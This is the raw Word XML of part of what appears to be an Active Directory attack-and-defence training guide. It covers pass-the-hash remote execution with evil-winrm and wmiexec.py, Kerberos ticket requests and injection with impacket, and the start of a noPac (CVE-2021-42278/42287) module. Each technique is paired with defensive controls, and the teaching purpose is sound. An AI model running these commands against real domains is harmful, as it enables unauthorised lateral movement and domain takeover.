    <w:p w14:paraId="465CD75B" w14:textId="0E628A8C" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00556DCC" w:rsidP="00294E91">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35FFBFCD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72BEA203" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7569DC3F" w14:textId="77777777" w:rsidR="00294E91" w:rsidRPr="00294E91" w:rsidRDefault="00294E91" w:rsidP="00294E91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Remote execution over WinRM using administrator NT hash structures</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>evil-winrm -i &lt;DC_IP&gt; -u Administrator -H aad3b435b51404eeaad3b435b51404ee:</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>32693</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b11e6aa90eb43d32c72a07ceea6</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># WMI process invocation utilizing NTLM cryptographic material</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>32693</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b11e6aa90eb43d32c72a07ceea6 domain.local/</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Administrator@</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CB99116" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="00676591" w:rsidRDefault="0024425A" w:rsidP="00294E91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="667E4EF4" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59780F05" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28981E1B" w14:textId="0CB01090" w:rsidR="00556DCC" w:rsidRPr="00676591" w:rsidRDefault="00556DCC" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deploy Local Administrator Password Solution (LAPS) across all non-DC endpoints to isolate local hashes. Enforce the Protected Users Security Group to completely prohibit NTLM credential caching for privileged assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C00B9D" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294B5391" w14:textId="7EBCB030" w:rsidR="00556DCC" w:rsidRPr="00294E91" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ticket Granting Ticket (TGT) Injection Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41093211" w14:textId="6671A92E" w:rsidR="00556DCC" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inject standard Kerberos operational tokens directly into memory to gain legitimate access paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EB96F" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299875EF" w14:textId="09E15B2D" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00556DCC">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D3130" w14:paraId="2E5AA592" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F11C4D" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C11FC71" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Request valid identity infrastructure TGT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E4B85" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>impacket-getTGT domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="A02B93" w:themeColor="accent5"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AdminUser</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'SecurePassword123!'</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -dc-ip &lt;DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="347430AB" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="687BD3A1" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Establish environment memory space caching</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7172BA93" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">export </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>KRB5CCNAME=$(pwd)/</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="A02B93" w:themeColor="accent5"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AdminUser</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.ccache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596C999A" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="364DA10E" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># Execute commands over authenticated remote endpoints via Kerberos transport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B287671" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>evil-winrm -i dc01.domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">local </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-r domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3130">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313DE3D8" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="668E8C2E" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDE91D8" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Defensive Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFEC538" w14:textId="2D4172D0" w:rsidR="006D3130" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement strict Kerberos Armoring (FAST) configurations via Group Policy. Restrict remote management to dedicated administrative workstations (PAWs &amp; SAWs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D951F" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4C44A9" w14:textId="5B950C1E" w:rsidR="00556DCC" w:rsidRPr="0024425A" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Module 5: IdP Trust Flaws and Privilege Escalation Mitigation (CVE Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07FCF9" w14:textId="277FC6AE" w:rsidR="006F4908" w:rsidRPr="0024425A" w:rsidRDefault="006F4908" w:rsidP="00556DCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Architectural validation flaws within an Identity Provider (IdP) create direct vectors for instant domain compromise and takeover. In Active Directory (AD), inconsistencies in how Domain Controllers (DCs) validate machine accounts and parse security tokens allow a standard user to masquerade or impersonate a critical infrastructure asset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB4B60" w14:textId="4263B757" w:rsidR="0024425A" w:rsidRPr="0024425A" w:rsidRDefault="0024425A" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F4908" w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Chain Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB01BBA" w14:textId="3CE76503" w:rsidR="006F4908" w:rsidRPr="0024425A" w:rsidRDefault="0024425A" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="006F4908" w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>he “noPac” Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14003EF2" w14:textId="7C8BAC9A" w:rsidR="006F4908" w:rsidRPr="0024425A" w:rsidRDefault="006F4908" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The noPac exploit chain combines two distinct vulnerabilities: CVE-2021-42278 and CVE-2021-42287 to bypass the Kerberos authentication model. When chained together, they grant any standard domain user the ability to impersonate a Domain Controller account and request a Domain Admin Kerberos Ticket Granting Ticket (TGT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B939A9D" w14:textId="35822DC6" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
